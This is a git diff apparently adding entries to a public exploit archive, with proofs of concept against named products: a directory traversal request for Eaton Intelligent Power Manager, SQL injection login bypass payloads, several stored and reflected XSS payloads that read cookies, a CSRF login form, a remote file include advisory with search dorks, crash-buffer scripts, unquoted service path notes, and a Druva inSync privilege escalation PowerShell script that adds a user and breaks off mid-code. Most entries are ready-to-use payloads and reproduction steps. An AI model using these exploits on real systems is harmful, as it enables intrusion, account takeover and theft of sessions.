diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt
new file mode 100644
index 000000000..717c037e3
--- /dev/null
+++ b/exploits/hardware/webapps/48614.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+# Date: 2018-09-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://powerquality.eaton.com/
+# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
+# Version: v1.6
+# Tested on: Windows
+
+# CVE-2018-12031
+# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+
+# PoC
+To exploit vulnerability, someone could use
+'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
+request to get some informations from the target.
+
+GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
+Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt
new file mode 100644
index 000000000..95aaa00d5
--- /dev/null
+++ b/exploits/multiple/webapps/49165.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
+# Date: 2020–11–17
+# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Version: 1.1
+# Tested on Parrot os(Linux)
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/erms/admin/index.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3)Server accept this payload and attacker successfully bypassed admin panel
+without any credentials
\ No newline at end of file
diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py
index 83c91739a..1095f0049 100755
--- a/exploits/php/webapps/39033.py
+++ b/exploits/php/webapps/39033.py
@@ -1,17 +1,17 @@
 #!/usr/bin/env python
 
-# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
 # Date: 12/17/2015
 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
 # Vendor Homepage: https://www.joomla.org/
 # Software Link: http://joomlacode.org/gf/project/joomla/frs/
-# Version: Joomla 1.5 - 3.4.5
+# Version: Joomla 1.5 - 3.4.6
 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
 # CVE : CVE-2015-8562
 
 
 '''
-    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
     PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
 
     Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt
new file mode 100644
index 000000000..5c18b5607
--- /dev/null
+++ b/exploits/php/webapps/48700.txt
@@ -0,0 +1,54 @@
+# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
+# Date: 2020-08-20
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://pandorafms.org/
+# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: 7.0NG747
+# Tested on: Windows/Linux/ISO
+
+# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
+
+# Description
+A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
+an attacker performing malicious actions to users who open a maliciously
+crafted link or third-party web page. (Workspace >> Issues >> List of
+issues >> Add - Attachment)
+
+# PoC
+
+To exploit vulnerability, someone could use a POST request to
+'/pandora_console/index.php' by manipulating 'filename' parameter in the
+request body to impact users who open a maliciously crafted link or
+third-party web page.
+
+POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
+Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------188134206132629608391758747427
+Content-Length: 524
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
+Upgrade-Insecure-Requests: 1
+
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="userfile"; filename="\"><svg
+onload=alert(document.cookie)>.png"
+Content-Type: image/png
+
+"><svg onload=alert(1)>
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="file_description"
+
+desc
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="upload"
+
+Upload
+-----------------------------188134206132629608391758747427--
\ No newline at end of file
diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt
new file mode 100644
index 000000000..4b948e8f8
--- /dev/null
+++ b/exploits/php/webapps/49064.txt
@@ -0,0 +1,316 @@
+# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-11
+# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Version: 3.5.3
+
+Document Title:
+===============
+SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2265
+
+
+Release Date:
+=============
+2020-11-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2265
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+It offers numerous opportunities to present pictures quickly and easily
+in articles. The unique feature of the plugin is
+that you can control any parameter on the syntax call. Editor Button -
+SIGE Parameters: With the button, you can set the
+parameters very easy on-the-fly in an article. It is an excellent
+addition to SIGE. Highlights are: parameter call, watermark
+function, read IPTC data, thumbnail storage, crop function, sort by
+modification date, output as a list, CSS Image Tooltip,
+Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
+rewritten entirely and equipped with numerous innovations.
+The absolute highlight is the turbo mode. This feature doesn't exist in
+any other plugin for Joomla!. In Turbo Mode 2 text files
+are created from the HTML output of the gallery and loaded in successive
+runs. This feature eliminates the tedious editing
+process of each image. In a test with 50 large images, the creation of a
+gallery with all the extra features (save thumbnails,
+watermark generation, resize original images, etc.) without turbo mode
+lasted approximately 17 seconds. In turbo mode, it only
+took 1 second, and the gallery on the same scale was available! For
+calling the syntaxes, additionally, an Editor Button has
+been programmed. It makes it very easy to choose the required syntax,
+showing all the settings and parameters of the plugin.
+It is a great enrichment in using the SIGE plugin.
+
+(Copy of the Homepage:
+https://kubik-rubik.de/sige-simple-image-gallery-extended )
+(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
+https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
+https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
+
+
+Abstract Advisory Information:
+==============================
+An independent vulnerability laboratory researcher discovered multiple
+web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+
+
+Affected Product(s):
+====================
+Vendor:
+Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
+Joomla Extension (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-10: Researcher Notification & Coordination (Security Researcher)
+2020-11-11: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+1.1
+A file include vulnerability has been discovered in the official Simple
+Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
+The web vulnerability allows remote attackers to unauthorized upload
+web-shells or malicious contents to compromise the local file-system.
+
+The vulnerability is located in the img parameter of the print.php file.
+Remote attackers are able to upload images to the unrestricted assets
+path to compromise the web-applications file-system and involved
+database management system. Exploitation requires no user interaction
+and only
+a low privileged user account to upload images.
+
+
+1.2
+Multiple non-persistent cross site web vulnerabilities has been
+discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+The vulnerability allows remote attackers to inject own malicious script
+codes with non-persistent attack vector to compromise browser to
+web-application requests from the client-side.
+
+The non-persistent cross site scripting web vulnerabilities are located
+in the `name` and `title` parameters of the `print.php` file.
+Remote attackers without user or guest privileges are able to make own
+malicious special crafted links to compromise client-side
+GET method requests. The attack vector is non-persistent and the issue
+affects the client-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent
+external redirects to malicious source and non-persistent client-side
+manipulation of affected application modules.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote file include web vulnerability can be exploited by remote
+attackers without privileged user account or user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
+VULNERABILITY!]&name=[NAME]%20title=[TITLE]
+
+
+1.2
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without privileged user account and with
+low user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Payload
+"><svg onload=alert()>
+'><script>alert('');</script>
+<IMG "'"><script>alert()</script>'>
+
+PoC: Example
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
+XSS]
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
+?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The remote file include vulnerability issue can be resolved by the
+following steps ...
+
+Example :
+?php
+$files=array('test.gif');
+if(in_array($_GET['file'], $files)){
+include ($_GET['file']);
+}
+?
+* If you are a server administrator, turn off allow_url_fopen from the file
+
+* Or do it with the ini_set command. Only for (RFI)
+?php
+ini_set('allow_url_fopen ', 'Off');
+?
+
+* We can use the strpos command to check that if the address is: //
+http, the file will not be enclosed
+?php
+$strpos = strpos($_GET['url'],'http://');
+if(!$strpos){
+include($_GET['url']);
+}
+?
+
+* Using str_replace we can give the given address from two characters
+"/", "." Let's clean up
+?php
+$url=$_GET['url'];
+$url = str_replace("/", "", $url);
+$url = str_replace(".", "", $url);
+include($url);
+?
+
+
+1.2
+The client-side cross site scripting vulnerabilities can be resolved by
+the following steps ...
+1. Encode and escape as parse the name and title parameters
+2. Filter the input for special chars and disallow them in parameters
+
+
+Security Risk:
+==============
+1.1
+The securit risk of the remote file include vulnerability in the img
+path of the web-application request is estimated as high.
+
+1.2
+The security risk of the non-persistent cross site scripting
+vulnerabilities is estimated as medium.
+
+
+Credits & Authors:
+==================
+h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
+Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt
new file mode 100644
index 000000000..5220768ca
--- /dev/null
+++ b/exploits/php/webapps/49180.txt
@@ -0,0 +1,32 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+An attacker can craft HTML page containing POST information to have the
+victim sign into an attacker's account, where the victim can add
+information assuming he/she is logged into the correct account, where in
+reality, the victim is signed into the attacker's account where the changes
+are visible to the attacker.
+
+Exploit:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/loginsystem/" method="POST">
+      <input type="hidden" name="uemail" value="user1@mail.com" />
+      <input type="hidden" name="password" value="User@1234" />
+      <input type="hidden" name="login" value="LOG&#32;IN" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Mitigation:
+Please add a csrf token to login request or make some type prompt that the
+session has ended when the new login from attacker occurs.
\ No newline at end of file
diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt
new file mode 100644
index 000000000..22d469727
--- /dev/null
+++ b/exploits/php/webapps/49204.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
+# Date: 04-12-2020
+# Exploit Author: Pruthvi Nekkanti
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Admin Username.
+
+Steps-To-Reproduce:
+1. Go to the Product admin panel change the admin username
+2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt
new file mode 100644
index 000000000..0a668289d
--- /dev/null
+++ b/exploits/php/webapps/49208.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://github.com/savsofts/savsoftquiz_v5
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload in User
+Registration section and each time admin visits the manage user section
+from admin panel, and home page too. XSS triggers and attacker can able to
+steal the cookie according to the crafted payload.
+
+Steps to reproduce:
+1. Create new account and verified it.
+
+2. Navigate to Edit Profile:
+-> http://localhost/savsoftquiz/index.php/user/edit_user/123
+
+3. Put the below Payload in Skype ID field. and submit it.
+Payload: abcd<script>alert("XSS")</script>
+
+4. You will get XSS popup.
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
new file mode 100644
index 000000000..06ea8299c
--- /dev/null
+++ b/exploits/php/webapps/49209.txt
@@ -0,0 +1,28 @@
+# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
+# Date: 05.09.2020
+# Author: Vincent666 ibn Winnie
+# Software Link: https://www.vbulletin.com/en/features/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox & Opera
+# Google Dorks: "Powered by vBulletin® Version 5.6.3"
+
+Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
+Choose "Denim" or other theme and choose action "Add new template" and
+click "Go".
+
+Put on the title "1" and template "1" and "Save and Reload". Now you
+can catch the new URL with HTTP Live Headers or with hands.
+
+So..we have Url :
+
+https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
+
+Test it with hands and get cross site scripting. Use for tests
+different browsers. I use Mozilla Firefox and Opera.
+
+https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
+Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
+
+Picture:
+
+https://imgur.com/a/b6gH5Fn
\ No newline at end of file
diff --git a/exploits/php/webapps/49212.txt b/exploits/php/webapps/49212.txt
new file mode 100644
index 000000000..1892fc234
--- /dev/null
+++ b/exploits/php/webapps/49212.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
+# Date: 2020-12-07
+# Exploit Author: Sakshi Sharma
+# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: admin page
+
+#Exploit
+	Open the Application
+	check the URL:
+	http://localhost/busreservation/index.php
+	Open Admin Login
+	Enter username: 'or"='
+	Enter password: 'or"='
+	click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49215.txt b/exploits/php/webapps/49215.txt
new file mode 100644
index 000000000..dba26e9e4
--- /dev/null
+++ b/exploits/php/webapps/49215.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
+# Date: 08/12/2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Steps to Reproduce:
+1) Login with Admin Credentials and click on 'Task' button.
+2) Click on Add New Task Button.
+3) Now add the following payload input field of Task and Description
+
+Payload:  ritesh"><img src=x onerror=alert(document.domain)>
+
+4) Click On Save
+5) XSS payload is triggered.
\ No newline at end of file
diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt
new file mode 100644
index 000000000..178a59860
--- /dev/null
+++ b/exploits/windows/dos/49206.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Version: 2.13.7 x64
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program TapinRadio 
+# In Settings select Preferences option
+# Click in Miscellaneous and click in Set Application Proxy
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Mikon.txt"
+# Paste the content in the field Username and Address and click in OK
+# Click in Ok again
+# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Mikon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt
new file mode 100644
index 000000000..927ff39a9
--- /dev/null
+++ b/exploits/windows/dos/49207.txt
@@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: https://www.raimersoft.com/rarmaradio.html
+# Version: 2.75.5
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program TapinRadio 
+# In Edit select Settings option
+# Click in Network
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Paimon.txt"
+# Paste the content in the field Username, Address and Server and click in OK
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Paimon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt
new file mode 100644
index 000000000..32951e2e5
--- /dev/null
+++ b/exploits/windows/local/49015.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
+# Discovery by: Erika Figueroa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 1.0.0.55
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
+
+Realtek Audio Service                                                   RtkAudioService                     C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe            Auto
+# Service info:
+
+C:\>sc qc "RtkAudioService"
+[[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: RtkAudioService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Realtek Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt
new file mode 100644
index 000000000..8d2780566
--- /dev/null
+++ b/exploits/windows/local/49158.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
+# Discovery by: manuel Alvarez
+# Discovery Date: 2020-11-07
+# Vendor Homepage:  https://www.realtek.com/en/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i
+"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
+/v """
+
+Andrea RT Filters Service
+AERTFilters                         C:\Program Files\IDT\WDM\AESTSr64.exe
+             Auto
+
+# Service info:
+
+C:\Users\ComoDVD>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Andrea ST Filters Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt
new file mode 100644
index 000000000..53d0928a3
--- /dev/null
+++ b/exploits/windows/local/49203.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+
+C:\Users\m507>sc qc "RumbleService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RumbleService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Rumble Mail Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt
new file mode 100644
index 000000000..69f50d3c0
--- /dev/null
+++ b/exploits/windows/local/49205.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 05-12-2020
+# Vendor Homepage: https://www.kite.com/
+# Software Links : https://www.kite.com/download/
+# Tested Version: 1.2020.1119.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+KiteService	KiteService	C:\Program Files\Kite\KiteService.exe	Auto
+
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1
new file mode 100644
index 000000000..13589ac59
--- /dev/null
+++ b/exploits/windows/local/49211.ps1
@@ -0,0 +1,32 @@
+# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
+# Date: 2020-12-03
+# Exploit Author: 1F98D
+# Original Author: Matteo Malvica
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
+# Version: 6.6.3
+# Tested on: Windows 10 (x64)
+# CVE: CVE-2020-5752
+# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
+# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
+
+$ErrorActionPreference = "Stop"
+
+$cmd = "net user pwnd /add"
+
+$s = New-Object System.Net.Sockets.Socket(
+    [System.Net.Sockets.AddressFamily]::InterNetwork,
